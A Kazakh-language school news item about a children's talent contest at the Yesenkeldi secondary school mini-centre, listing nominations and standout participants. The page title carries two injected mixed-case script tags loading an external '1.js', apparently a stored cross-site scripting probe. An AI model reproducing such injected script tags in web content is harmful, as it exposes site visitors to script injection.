«Балғын шақ» байқауы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

22.02.2019

«Балғын шақ» байқауы

Есенкелді орта мектебінің «Ақ бота» шағын –орталығында бүлдіршіндер арасында «Балғын шақ» байқауы өткізілді. Байқау үш кезеңнен тұрады. «Мен бақытты баламын» номинациясында өздерін таныстыруда А.Сағымбаев, Я.Қозбағарова көзге түсті. Бүлдіршіндер өлең жолдарымен өзі, ата-анасы, сүйікті жайлы еркін жеткізе білді. «Ойдық көркі тіл» номинациясында қатысушылар  туған жері, отаны жайлы мәнерлеп тақпақтарын оқып берді. Тілге бай, ойлары жетік екендіктерін А.Сағымбаев,  Р.Ракашева, М.Аушакимова  көрсетті. Шығармашылық байқауда өр мінезді қазақ баласын «Қара жорға» биімен паш етіп жұртты таң қалдырған А. Сағымбаев болды.Мың бұралған кішкентай қыздар «Қамажай» биін жоғары деңгейде орындап шықты. Бұл номинацияда Р.Ракашева,  Ф.Данияр өздерін көрсетті. Кіп-кішкентай Дарина қыз үнді биін билеп көрермендерді қуантты.  Байқау соңында қатысушыларды мақтау қағазымен марапаттап, тәттілер таратылды.

Просмотров: 1838


Пікір қосу



Деректерді қолтаңбаға қосу